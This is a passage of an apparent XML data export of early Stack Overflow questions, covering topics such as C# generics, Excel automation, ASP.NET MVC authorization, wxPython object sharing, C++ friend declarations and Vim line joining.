&lt;p&gt;&lt;strong&gt;Edit 2:&lt;/strong&gt; Through trial and error, we learned that the &lt;code&gt;==&lt;/code&gt; operator will use the predefined reference comparison when using an unrestricted generic type. Actually, the compiler will use the best method it can find for the restricted type argument, but will look no further. For example, the code below will always print &lt;code&gt;true&lt;/code&gt;, even when &lt;code&gt;Test.test&amp;lt;B&amp;gt;(new B(), new B())&lt;/code&gt; is called:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class A { public static bool operator==(A x, A y) { return true; } }
class B : A { public static bool operator==(B x, B y) { return false; } }
class Test { void test&amp;lt;T&amp;gt;(T a, T b) where T : A { Console.WriteLine(a == b); } }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>In Excel automation, how to gracefully handle invalid file format error upon file opening?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to open a Microsoft Excel file in a C# program using the 'excelApp.Workbooks.Open()' method. As it happens, if the format of the file is invalid, this method causes an error message box to be displayed. I, however, don't want that; I wish to handle this error gracefully in my own code.&lt;/p&gt;
&lt;p&gt;My question is, how do I do that? &lt;/p&gt;
&lt;p&gt;The above method doesn't throw any exception which I can catch. Even if it did, there's still that pesky message box anyway. So perhaps the only way would be to validate the file format &lt;em&gt;before&lt;/em&gt; opening it. Is there, then, another method in Excel API to allow such validation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>asp.net mvc authorization using roles</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating an asp.net mvc application that has the concept of users.   Each user is able to edit their own profile.  For instance: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;PersonID=1 can edit their profile by going to &lt;a href="http://localhost/person/edit/1"&gt;http://localhost/person/edit/1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;PersonID=2 can edit their profile by going to &lt;a href="http://localhost/person/edit/2"&gt;http://localhost/person/edit/2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Nothing particularly exciting there...&lt;/p&gt;
&lt;p&gt;However, I have run into a bit of trouble with the Authorization scheme.  There are only two roles in the system right now, "Administrator" and "DefaultUser", but there will likely be more in the future.&lt;/p&gt;
&lt;p&gt;I can't use the regular Authorize attribute to specify Authorization because both users are in the same role (i.e., "DefaultUser").&lt;/p&gt;
&lt;p&gt;So, if I specify the Authorize Filter like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Authorize(Roles = "DefaultUser")]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;then there is no effect.  PersonID=1 can go in and edit their own profile (as they should be able to), but they can also just change the URL to &lt;a href="http://localhost/person/edit/2"&gt;http://localhost/person/edit/2&lt;/a&gt; and they have full access to edit PersonID=2's profile as well (which they should not be able to do).&lt;/p&gt;
&lt;p&gt;Does this mean that I have to create my own Authorization filter that checks if the action  the user is requesting "belongs" to them before allowing them access?  That is, if the edit action, with parameter = 1 is being requested by the currently logged in person, do I need to do a custom check to make sure that the currently logged in person is PersonID=1, and if so, authorize them, and if not, deny access?&lt;/p&gt;
&lt;p&gt;Feels like I'm missing something obvious here, so any guidance would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I trim date in PLSQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a date variable as 24-dec-08
I want only the 08 component from it.
How do I do it in a select statement?&lt;/p&gt;
&lt;p&gt;e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select db||sysdate 
(this is the component where I want only 08 from the date) 
from gct;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do i do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is an HttpHandler in ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is an HttpHandler in ASP.NET? Why and how is it used?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to programmatically distinguish between versions of SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Basically, is it possible to identify if some-one hooks up my program to SQL server Compact or Express Edition? I want to be able to restrict different versions of my product to different versions of SQL Server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>phpunit warning on an utilitary class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use phpUnit on a integration server to run all tests and if I lauch phpunit command from the command line, I receive&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PHPUnit 3.2.18 by Sebastian Bergmann.
F..III..I......I.IIII...
Time: 6 seconds
There was 1 failure:
1) Warning(PHPUnit_Framework_Warning)
No tests found in class "TU".
FAILURES
Tests: 24, Failures: 1, Incomplete: 9.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Via apache, running the same test file :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PHPUnit 3.2.18 by Sebastian Bergmann.
..III..I......I.IIII...
Time: 7 seconds
OK, but incomplete or skipped tests!
Tests: 23, Incomplete: 9.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My TU class just include all tests classes with a $suite-&gt;addTestFile(),
and which have two static functions : main() which run all the tests,
and suite() which return the tests suite.
But the TU class is not in the primary file given as parameter to
phpunit command, it's a generic class wich scan files and list all test
class.&lt;/p&gt;
&lt;p&gt;I have the same problem with a class witch extends PHPUnit_Framework_TestCase to add specific assert(), wich is not included via $suite-&gt;addTestFile() but only by a require().&lt;/p&gt;
&lt;p&gt;How can I correct this?
Thanks in advance&lt;/p&gt;
&lt;p&gt;Regards
CÃ©dric&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Make &lt;div&gt; resizeable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to make a &amp;lt;div&amp;gt; container resizeable with drag'n'drop? So that the user can change the size of it using drag'n'drop?&lt;/p&gt;
&lt;p&gt;Any help would really be appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET GridView sorting on a calculated field</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a DataBound GridView.  However I have one column where the value comes from a calculation in the code behind - it is displayed within a TemplateField.&lt;/p&gt;
&lt;p&gt;How can a sort my grid based on this calculated value ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript Prototypal Inheritance Doubt II</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'been doing some inheritance in js in order to understand it better, and I found something that confuses me.&lt;/p&gt;
&lt;p&gt;I know that when you call an 'constructor function' with the new keyword, you get a new object with a reference to that function's prototype.&lt;/p&gt;
&lt;p&gt;I also know that in order to make prototypal inheritance you must replace the prototype of the constructor function with an instance of the object you want to be the 'superclass'.&lt;/p&gt;
&lt;p&gt;So I did this silly example to try these concepts:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function Animal(){}
function Dog(){}
Animal.prototype.run = function(){alert("running...")};
Dog.prototype = new Animal(); 
Dog.prototype.bark = function(){alert("arf!")};
var fido = new Dog();
fido.bark() //ok
fido.run() //ok
console.log(Dog.prototype) // its an 'Object' 
console.log(fido.prototype) // UNDEFINED
console.log(fido.constructor.prototype == Dog.prototype) //this is true
function KillerDog(){};
KillerDog.prototype.deathBite = function(){alert("AAARFFF! *bite*")}
fido.prototype = new KillerDog();
console.log(fido.prototype) // no longer UNDEFINED
fido.deathBite(); // but this doesn't work!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(This was done in Firebug's console)&lt;/p&gt;
&lt;p&gt;1) Why if all new objects contain a reference to the creator function's prototype, fido.prototype is undefined?&lt;/p&gt;
&lt;p&gt;2) Is the inheritance chain [obj] -&gt; [constructor] -&gt; [prototype] instead of [obj] -&gt; [prototype] ?&lt;/p&gt;
&lt;p&gt;3) is the 'prototype' property of our object (fido) ever checked? if so... why is 'deathBite' undefined (in the last part)?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>System design: Preventing/detecting vote fraud</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In light of the recent &lt;a href="http://blog.stackoverflow.com/2008/12/vote-fraud-and-you/" rel="nofollow"&gt;vote fraud incident&lt;/a&gt; here, I was wondering if anyone out there is familiar with building systems for preventing or detecting undesirable voting behavior. I imagine the technology is widely used in search engines, online advertising (e.g. click fraud), and community sites (e.g. Digg, reddit), but surprisingly little is made public for obvious reasons.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So this is my question: How would you design such a system, taking into account complexity, and user experience? Is there some domain of academic research that looks into this?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;PS: This is &lt;em&gt;not&lt;/em&gt; a question about the fraud detection mechanism or your recent personal experience here; for that please see &lt;a href="http://stackoverflow.com/questions/389509/how-does-the-so-voter-fraud-detection-mechanism-work"&gt;this other question&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Vim, what is the simplest way to join all lines in a file into a single line?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to join all lines in a file into a single line.  What is the simplest way of doing this?  I've had poor luck trying to use substitution (&lt;code&gt;\r\n&lt;/code&gt; or &lt;code&gt;\n&lt;/code&gt; doesn't seem to get picked up correctly in the case of &lt;code&gt;s/\r\n//&lt;/code&gt; on Windows).  Using &lt;code&gt;J&lt;/code&gt; in a range expression doesn't seem to work either (probably because the range is no longer in 'sync' after the first command is executed).&lt;/p&gt;
&lt;p&gt;I tried &lt;code&gt;:1,$norm! J&lt;/code&gt; but this only did half of the file - which makes sense because it just joins each line once.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Form designer inconsistent in control display style for updated project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a project that I started in Turbo Delphi, which I recently updated to D2009, and I've noticed a bit of a quirk in the form designer.  All the old forms have a Win98 style applied to them. The buttons are gray with sharp square edges, for example. But any new form I've created since the upgrade displays its controls in WinXP style.  If I copy a control from an old form and paste it to a new one, the style changes.  At runtime, all controls from all forms are shown in XP style.&lt;/p&gt;
&lt;p&gt;Any idea what's causing my old forms to show in an old style? I've looked through the properties list, but nothing jumps out at me.  But there's obviously something, and it's persistent because saving and reloading doesn't change it.  Anyone know where this property is and how I can fix it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>wxPython and sharing objects between windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been working with python for a while now and am just starting to learn wxPython.  After creating a few little programs, I'm having difficulty understanding how to create objects that can be shared between dialogs.&lt;/p&gt;
&lt;p&gt;Here's some code as an example (apologies for the length - I've tried to trim):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import wx
class ExampleFrame(wx.Frame):
    """The main GUI"""
    def __init__(self, parent, id, title):
        wx.Frame.__init__(self, parent, id, title, size=(200,75))
        mainSizer = wx.BoxSizer(wx.VERTICAL)
        # Setup buttons
        buttonSizer = wx.BoxSizer(wx.HORIZONTAL)
        playerButton = wx.Button(self, wx.ID_ANY, "Player number", wx.DefaultPosition, wx.DefaultSize, 0)
        buttonSizer.Add(playerButton, 1, wx.ALL | wx.EXPAND, 0)
        nameButton = wx.Button(self, wx.ID_ANY, "Player name", wx.DefaultPosition, wx.DefaultSize, 0)
        buttonSizer.Add(nameButton, 1, wx.ALL | wx.EXPAND, 0)
        # Complete layout and add statusbar
        mainSizer.Add(buttonSizer, 1, wx.EXPAND, 5)
        self.SetSizer(mainSizer)
        self.Layout()
        # Deal with the events
        playerButton.Bind(wx.EVT_BUTTON, self.playerButtonEvent)
        nameButton.Bind(wx.EVT_BUTTON, self.nameButtonEvent)
        self.Show(True)
        return
    def playerButtonEvent(self, event):
        """Displays the number of game players"""
        playerDialog = PlayerDialogWindow(None, -1, "Player")
        playerDialogResult = playerDialog.ShowModal() 
        playerDialog.Destroy()
        return
    def nameButtonEvent(self, event):
        """Displays the names of game players"""
        nameDialog = NameDialogWindow(None, -1, "Name")
        nameDialogResult = nameDialog.ShowModal() 
        nameDialog.Destroy()
        return
class PlayerDialogWindow(wx.Dialog):
    """Displays the player number"""
    def __init__(self, parent, id, title):
        wx.Dialog.__init__(self, parent, id, title, size=(200,120))
        # Setup layout items
        self.SetAutoLayout(True)
        mainSizer = wx.BoxSizer(wx.VERTICAL)
        dialogPanel = wx.Panel(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL)
        dialogSizer = wx.BoxSizer(wx.VERTICAL)
        # Display player number
        playerNumber = "Player number is %i" % gamePlayer.number
        newLabel = wx.StaticText(dialogPanel, wx.ID_ANY, playerNumber, wx.DefaultPosition, wx.DefaultSize, 0)
        dialogSizer.Add(newLabel, 0, wx.ALL | wx.EXPAND, 5)
        # Setup buttons
        buttonSizer = wx.StdDialogButtonSizer()
        okButton = wx.Button(dialogPanel, wx.ID_OK)
        buttonSizer.AddButton(okButton)
        buttonSizer.Realize()
        dialogSizer.Add(buttonSizer, 1, wx.EXPAND, 5)
        # Complete layout
        dialogPanel.SetSizer(dialogSizer)
        dialogPanel.Layout()
        dialogSizer.Fit(dialogPanel)
        mainSizer.Add(dialogPanel, 1, wx.ALL | wx.EXPAND, 5)
        self.SetSizer(mainSizer)
        self.Layout()
        # Deal with the button events
        okButton.Bind(wx.EVT_BUTTON, self.okClick)
        return
    def okClick(self, event):
        """Deals with the user clicking the ok button"""
        self.EndModal(wx.ID_OK)
        return 
class NameDialogWindow(wx.Dialog):
    """Displays the player name"""
    def __init__(self, parent, id, title):
        wx.Dialog.__init__(self, parent, id, title, size=(200,120))
        # Setup layout items
        self.SetAutoLayout(True)
        mainSizer = wx.BoxSizer(wx.VERTICAL)
        dialogPanel = wx.Panel(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL)
        dialogSizer = wx.BoxSizer(wx.VERTICAL)
        # Display player number
        playerNumber = "Player name is %s" % gamePlayer.name
        newLabel = wx.StaticText(dialogPanel, wx.ID_ANY, playerNumber, wx.DefaultPosition, wx.DefaultSize, 0)
        dialogSizer.Add(newLabel, 0, wx.ALL | wx.EXPAND, 5)
        # Setup buttons
        buttonSizer = wx.StdDialogButtonSizer()
        okButton = wx.Button(dialogPanel, wx.ID_OK)
        buttonSizer.AddButton(okButton)
        buttonSizer.Realize()
        dialogSizer.Add(buttonSizer, 1, wx.EXPAND, 5)
        # Complete layout
        dialogPanel.SetSizer(dialogSizer)
        dialogPanel.Layout()
        dialogSizer.Fit(dialogPanel)
        mainSizer.Add(dialogPanel, 1, wx.ALL | wx.EXPAND, 5)
        self.SetSizer(mainSizer)
        self.Layout()
        # Deal with the button events
        okButton.Bind(wx.EVT_BUTTON, self.okClick)
        return
    def okClick(self, event):
        """Deals with the user clicking the ok button"""
        self.EndModal(wx.ID_OK)
        return 
class Player(object):
    """A game player"""
    def __init__(self, number, name):
        self.number = number
        self.name = name
        return
def main():
    # Start GUI
    global gamePlayer
    gamePlayer = Player(1, "John Smith")
    app = wx.App(redirect=False)
    frame = ExampleFrame(None, -1, "Example frame")
    frame.Show(True)
    app.MainLoop()
    return 0
if __name__ == '__main__':
    main()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, I want both of the dialogs to access the gamePlayer object.  At the moment, the only way I can think of doing it is to create the gamePlayer object as a global object, but these are normally frowned upon - is there a better way to do this?&lt;/p&gt;
&lt;p&gt;There is a method of passing objects in event bindings in &lt;a href="http://stackoverflow.com/questions/173687?sort=votes" rel="nofollow"&gt;this question&lt;/a&gt;, but it doesn't feel quite right.&lt;/p&gt;
&lt;p&gt;Is learning to implement the MVC pattern the way forward here?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why can't I declare a friend through a typedef?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know why typedefs of class names don't work like class names for the friend declaration?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class A
{
public:
};
class B : public A
{
public:
   typedef A SUPERCLASS;
};
typedef A X;
class C
{
public:
   friend class A;             // OK
   friend class X;             // fails
   friend class B::SUPERCLASS; // fails
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What are your (concrete) use-cases for metaclasses in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a friend who likes to use metaclasses, and regularly offers them as a solution.&lt;/p&gt;
&lt;p&gt;I am of the mind that you almost never need to use metaclasses. Why? because I figure if you are doing something like that to a class, you should probably be doing it to an object. And a small redesign/refactor is in order.&lt;/p&gt;
&lt;p&gt;Being able to use metaclasses has caused a lot of people in a lot of places to use classes as some kind of second rate object, which just seems disastrous to me. Is programming to be replaced by meta-programming? The addition of class decorators has unfortunately made it even more acceptable.&lt;/p&gt;
&lt;p&gt;So please, I am desperate to know your valid (concrete) use-cases for metaclasses in Python. Or to be enlightened as to why mutating classes is better than mutating objects, sometimes.&lt;/p&gt;
&lt;p&gt;I will start:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Sometimes when using a third-party
  library it is useful to be able to
  mutate the class in a certain way.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;(this is the only case I can think of, and it's not concrete)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing a value from PHP to JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have PHP code as in the following.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
    echo "&amp;lt;SCRIPT LANGUAGE='javascript'&amp;gt;add dd_Employee('".$id1."','".$fname1."',".$sal1.");&amp;lt;/SCRIPT&amp;gt;";
    echo "&amp;lt;SCRIPT LANGUAGE='javascript'&amp;gt;add dd_Employee('".$id2."','".$fname2."',".$sal2.");&amp;lt;/SCRIPT&amp;gt;";
    ....
?&amp;gt;
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And my JavaScript code contains&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var details=new Array();
function addEmployee(id,fname,salary){
    var temp=new Array(id,fname,salary);
    details[details.length]=temp;
    alert(temp);
}
function displayEmployee(){
    for (var i=0;i&amp;lt;details.length;i++)
        var temp_details=details[i];
    //Display the id,name,sal
    var id=temp_details[0];
    var name=temp_details[1];
    var sal=temp_details[2];
    alert(id);
    alert(name);
    alert(sal);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now the problem is whatever assigned by the PHP will visble only in &lt;code&gt;AddEmployee&lt;/code&gt;. Which means it is working fine. But inside &lt;code&gt;displayEmployee&lt;/code&gt; the value assigned by PHP will not work. Is there any flaw in my logic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using 64 bit OS for .Net development in VS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My development machine ( 32 bit Windows XP) runs excruciatingly slow when I am doing .Net development in Visual Studio 2008, thanks to the &lt;a href="http://itscommonsensestupid.blogspot.com/2008/10/impressions-on-resharper.html" rel="nofollow"&gt;installation of Resharper&lt;/a&gt;. So I am thinking about switching my development machine to 64 bit Windows XP. &lt;/p&gt;
&lt;p&gt;Not sure whether such a switch will speed up the development or not? 64 bit machines don't have memory problem, so the memory problem with Resharper can be solved by throwing in more and more RAM.&lt;/p&gt;
&lt;p&gt;Anyone develops using 64 bit OS? Care to share your experience?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding parameters for a program at launch</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently trying to make a small application that performs different duties. Right now I have a console app pop up and ask what I want to do, but sometimes I would rather just launch it with something like MyApp.exe -printdocuments or some such thing. &lt;/p&gt;
&lt;p&gt;Are there any tutorials out there that can show me a simple example of this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pole display problem in c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I used pole display(E POS) in my POS c# application.I have two major problem in that,
1. I can't clear the display perfectly.
2. I can't set the cursor position.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     I used some dirty tricks to do these.But I am not satisfied with that code.The following code i used.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Code :-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class PoleDisplay : SerialPort
{
    private SerialPort srPort = null;
    public PoleDisplay()
    {
        try
        {
            srPort = new SerialPort("COM1", 9600, Parity.None, 8, StopBits.One);
            if (!srPort.IsOpen) srPort.Open();
        }
        catch { }
    }
    ~PoleDisplay()
    {
        srPort.Close();
    }
    //To clear Display.....
    public void ClearDisplay()
    {
        srPort.Write("                    ");
        srPort.WriteLine("                    ");
    }
    //Display Function 
    //'line' 1 for First line and 0 For second line
    public void Display(string textToDisplay, int line)
    {
        if (line == 0)
            srPort.Write(textToDisplay);
        else
            srPort.WriteLine(textToDisplay);
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>how to prevent PHP's file_get_contents( )</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;one of my php page returns data like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
  //...
  echo "json string";
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but someone else use file_get_contents() to get my data and use in other website.&lt;/p&gt;
&lt;p&gt;can anybody tell me what can i do to prevent such thing happen. &lt;/p&gt;
&lt;p&gt;i consider if i can get the request's domain name to echo something else.but i dont know &lt;/p&gt;
&lt;p&gt;the function to get request's domain name.and if the request is sent by a server,that &lt;/p&gt;
&lt;p&gt;will be unhelpful. My English is poor, to express doubts, please bear with.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NHibernate Transactions in Open View per Session - suggested practices?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Cleaning up some transactional logic and wondered how other people were handling it.&lt;/p&gt;
&lt;p&gt;Ayende's recommendation seems to be to handle transactions at the service boundary. This is a ASP.NET web app though, so it hasn't got a clear cut service boundary, at least not right now.&lt;/p&gt;
&lt;p&gt;What do people do? &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Create a single transaction per request in a HttpModule and handle commit on EndRequest, rollback on Error?&lt;/li&gt;
&lt;li&gt;Create transactions in the actual "services" in the application and handle it multiple places?&lt;/li&gt;
&lt;li&gt;Something else?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How to do it in mysql: If id=idold THEN UPDATE status=1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to compare two tables and then update if some logic is true,
&lt;BR&gt;
In pseudo code:&lt;/p&gt;
&lt;p&gt;SELECT * FROM users, usersold IF users.id=usersold.id THEN UPDATE users.status=1;&lt;/p&gt;
&lt;p&gt;Is there a way to do it in mysql?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Force use of CDATA in XML-schema</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating an xml schema, and I want to make sure that the values in all the elements
are CDATA elements.&lt;/p&gt;
&lt;p&gt;Is there a way to force this using XML-schema?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Showing flash above content</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a page with a tutorial (&lt;a href="http://www.poromenos.org/tutorials/bittorrent/download" rel="nofollow"&gt;http://www.poromenos.org/tutorials/bittorrent/download&lt;/a&gt;), but the site layout obscures the flash player, which is too wide. Is there a way to show the flash above the content through the z-order (or something else, lightbox-y)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>FAST ESP vs Google Search Appliance for development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which of the two provides a better API for developing on top of?
Although there is a virtual Google Search Appliance available for download, no such equivalent is present for FAST.&lt;br /&gt;
So looking to developers with experience in either of these products to give suggestions and links to documentation. (especially for FAST as there's none available on their site)&lt;/p&gt;
&lt;p&gt;Kind regards,&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the device name in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I get my device name (using WinCE) in C# code ?&lt;/p&gt;
&lt;p&gt;It gives me only "WindowsCE" how can i get the type on name of the device ? (ex. symbol or datalogic or mio...)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is Symfony a better choice than Zend for a web development shop (10+) because it is a full stack framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My team at work is considering to use a framework for developing web sites and applications. Some of the seniors are convinced we should use the Zend Framework because it is easier to pick-and-choose the features so the framework we will be light-weight. &lt;/p&gt;
&lt;p&gt;I'm afraid however that they are only looking at the technical advantages that a lightweight framework will have. In my opinion it is better to have a full-stack framework (and I am a proponent of Symfony) because &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;It will also provide us with a standard way of working without writing new documentation.&lt;/li&gt;
&lt;li&gt;If we would like to use new features we would only have to read the documentation to see how it can be used instead of having to build it into our setup of Zend first.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I don't expect all my questions to be answered by everybody but this is what I am looking for in the answer: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Do I have a point here? &lt;/li&gt;
&lt;li&gt;Have you been in a similar situation and how did you handle that? &lt;/li&gt;
&lt;li&gt;Do you have more arguments that I could use OR could make me reconsider my own opinion? &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The context:
I work at a small shop with about 10 programmers. We mostly program PHP. We use a really simple inhouse developed framework and ORM library that are practically undocumented and lack anything but the most basic features (no validators, no transactions, no caching, no authentication)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Figure out the focused control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to add a CSS class to the Control that will get the focus, once a page is rendered. While the SetFocus() method of the Page class lets me set the Control, there is no corresponding GetFocus() method.&lt;/p&gt;
&lt;p&gt;According to the .Net sources, the information is stored in the private member _focusedControl of the Page class. The property FocusedControl is marked internal. &lt;/p&gt;
&lt;p&gt;Is there a way to get the value of the private member or internal property by using Reflection?&lt;/p&gt;
&lt;p&gt;Any help would be greatly appreciated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarification:&lt;/strong&gt;
Here is why I want to add a CssClass server side: I'm trying to apply the following 
JQuery script, that changes the background of the focused element:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(document).ready(function() {
  var elements = jQuery("textarea, select, multi-select, :text, :password, :file");
  elements.bind
  (
    'focus',
    function() {
      jQuery(this).addClass('highlightinput');
    }
  );
  elements.bind
  (
    'blur',
    function() {
      jQuery(this).removeClass('highlightinput');
    }
  );
})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works fine as long as I don't specifically set a focused control in my aspx.vb. If I do set a focused control (I think due to a timing issue), the focus is set before my handlers are attached to the input fields and thus, the input is not highlighted. So my approach would be to add the highlightinput class to the focused control before rendering the page.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good scripting language for basic file operations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I often need to copy, move or rename files and directories based on some criteria as I collect data from many resources and I like to keep things organized. What scripting language provides the most intuitive and easy to use methods for these operations? Here is an example scenario:&lt;/p&gt;
&lt;p&gt;I keep my music in a folder hierarchy like below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;amp;Artist Name(upper case letters)&amp;amp;
-- (&amp;amp;album release year&amp;amp;) &amp;amp;album name&amp;amp;
---- \*.*
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to find out which folders break these rules under my music folder. I would also like to make them fit to the structure I use, if they have a consistent but different structure of file naming and directory schemes.&lt;/p&gt;
&lt;p&gt;I work in both Windows and Linux, so I thought of giving bash a try (thanks to cygwin) as I am familiar with it a little.  What do you guys think? Is there a better solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Auto accepting contacts using phpmsnclass</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hello
I'm currently using &lt;a href="http://code.google.com/p/phpmsnclass/" rel="nofollow"&gt;phpmsnclass&lt;/a&gt; to send messages to contacts on the MSN network. But to get the nickname on my "bot" to work I have to accept the "friend-request" my contacts has sent me.&lt;/p&gt;
&lt;p&gt;From the debuginfo I have found that around line 1672 in the file msn.clas.php it's a kind of auto-accepting feature. But I cant use the doLoop function that has this feature cause it never ends.&lt;/p&gt;
&lt;p&gt;So is there anyone who has time to check this out for me, or have another framework for working with msn that may be better on this? Have read about the MSN Network a lot now, but I haven't got the knowledge of doing this out of my own mind, I need some hints.&lt;/p&gt;
&lt;p&gt;In advance: thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find a good FFT sample implementation/tutorial?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been looking everywhere for a sample Fast Fourier Transform implementation/tutorial in (preferably) C#.&lt;/p&gt;
&lt;p&gt;However, every one I've found has been poor at explaining what's going on, and/or poorly commented; or they assume that you already know the FFT algorithm, or they're tutorials about how to USE FFTs.&lt;/p&gt;
&lt;p&gt;Anyone know of a good sample/tutorial? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Would you recommend Java/Glassfish/Metro for brand-new project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I developed in ASP.NET 2.0 for some time, and for slightly less time in Java/Spring/Hibernate. Right now I start developing new web-service and am confused with the choice of:&lt;/p&gt;
&lt;p&gt;.NET WCF 3.5 versus Java/Metro.&lt;/p&gt;
&lt;p&gt;From one side, WCF seems like a brilliantly developed solution, a masterpiece of software frameworks, with all the support for functional languages, easy wizards, simple architecture. The downside is that it seems to be running on Windows only (Mono doesn't support WCF) and doesn't integrate so beautifully with Ruby on Rails (through JRuby as Java does).&lt;/p&gt;
